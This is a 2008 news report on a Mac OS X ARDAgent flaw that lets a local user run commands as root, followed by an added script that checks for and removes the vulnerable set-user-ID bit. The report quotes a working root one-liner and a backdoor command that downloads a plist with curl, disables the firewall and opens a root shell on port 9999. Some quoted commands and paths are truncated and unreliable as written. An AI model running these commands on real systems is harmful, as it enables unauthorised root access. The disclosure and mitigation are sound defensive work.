In association with heise online

20 June 2008, 10:58

Root exploit for Mac OS X


A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for anyone with a local account to obtain root rights on the system. ARDAgent, the Apple Remote Desktop agent that belongs to Remote Management, is installed set-user-ID root. Because ARDAgent is also scriptable, any user can send it an AppleScript command with a "do shell script" clause; the shell commands it contains are then executed with root rights, and no password is asked for.

To demonstrate the problem, log in as a standard user or guest and type osascript -e 'tell app "ARDAgent" to do shell script "whoami"' into a Terminal window; on a vulnerable system the output is root. Physical access to the machine is not required for an attack to succeed: in principle the exploit also works remotely, for instance on a server on which a user has only a restricted account with SSH access.

A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl "' opened a root shell at TCP port 9999.

Several workarounds have been suggested. The exploit does not work on Mac OS X 10.5 if "Remote Management" is enabled under System Preferences/Sharing, but that is not the default setting. Nor does it work on Mac OS X 10.4 if the Apple Remote Desktop client has been installed and enabled. Other suggestions are to remove Apple Remote Desktop completely, to compress the ARDAgent bundle into an archive so that the set-user-ID binary no longer exists on disk as an executable, or to clear the set-user-ID bit on the ARDAgent binary with chmod u-s /System/Library/CoreServices/RemoteManagement/ ent. Whichever workaround is chosen, a later software update that reinstalls ARDAgent may restore the bit, so the check should be repeated after updates.
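The following script is added here as an example and is not part of the original article or of Apple's software. It checks whether the ARDAgent binary still carries the set-user-ID bit (the condition the osascript test above exploits), strips the bit on request (the chmod u-s workaround quoted above) and verifies afterwards that the bit is really gone. The path in ARDAGENT_BIN is an assumption about where the binary is installed; pass another path as an argument if yours differs, and run the script with sudo when using --fix. Because it relies only on the POSIX test -u operator, the same functions work against any file on any Unix-like system:

```shell
#!/bin/sh
# ardcheck.sh: added example, not code from the original article.
# Checks a binary for the set-user-ID bit, optionally removes it, and verifies
# the result. Save as ardcheck.sh and run:  sh ardcheck.sh   or   sudo sh ardcheck.sh --fix

# Assumed location of the ARDAgent binary (assumption; adjust if needed).
ARDAGENT_BIN="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# ard_is_setuid PATH -> exit status 0 if PATH exists and has the set-user-ID bit.
ard_is_setuid() {
    [ -u "$1" ]
}

# ard_owner PATH -> prints the owner of PATH (third field of ls -l, portable
# across macOS and Linux without relying on stat's differing options).
ard_owner() {
    ls -ld "$1" | awk '{ print $3 }'
}

# ard_drop_setuid PATH -> clears the set-user-ID bit and succeeds only if the
# bit is really gone afterwards (chmod can succeed without the bit changing on
# some filesystems, so the result is re-checked rather than trusted).
ard_drop_setuid() {
    chmod u-s "$1" && ! ard_is_setuid "$1"
}

# ard_report PATH -> prints one line and returns 0 (setuid, i.e. vulnerable),
# 1 (no setuid bit) or 2 (file missing), so callers can branch on the status.
ard_report() {
    p="$1"
    if [ ! -e "$p" ]; then
        echo "MISSING: $p (not installed, nothing to fix)"
        return 2
    fi
    if ard_is_setuid "$p"; then
        echo "VULNERABLE: $p is set-user-ID, owner $(ard_owner "$p")"
        return 0
    fi
    echo "OK: $p has no set-user-ID bit"
    return 1
}

# main [--fix] [PATH]: report, and with --fix also strip the bit and verify.
main() {
    fix=0
    if [ "$1" = "--fix" ]; then fix=1; shift; fi
    target="${1:-$ARDAGENT_BIN}"
    if ard_report "$target" && [ "$fix" -eq 1 ]; then
        if ard_drop_setuid "$target"; then
            echo "FIXED: set-user-ID bit removed from $target"
        else
            echo "FAILED: could not remove the bit (run with sudo?)"
        fi
    fi
}

# Only run main when invoked as a script, so the functions can also be sourced.
if [ "$(basename "$0")" = "ardcheck.sh" ]; then main "$@"; fi
```

Note that clearing the bit prevents the privilege escalation but also stops ARDAgent from doing the privileged work it needs when Remote Management is genuinely in use, so on machines that rely on Apple Remote Desktop the archive or reinstall route is the safer choice.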
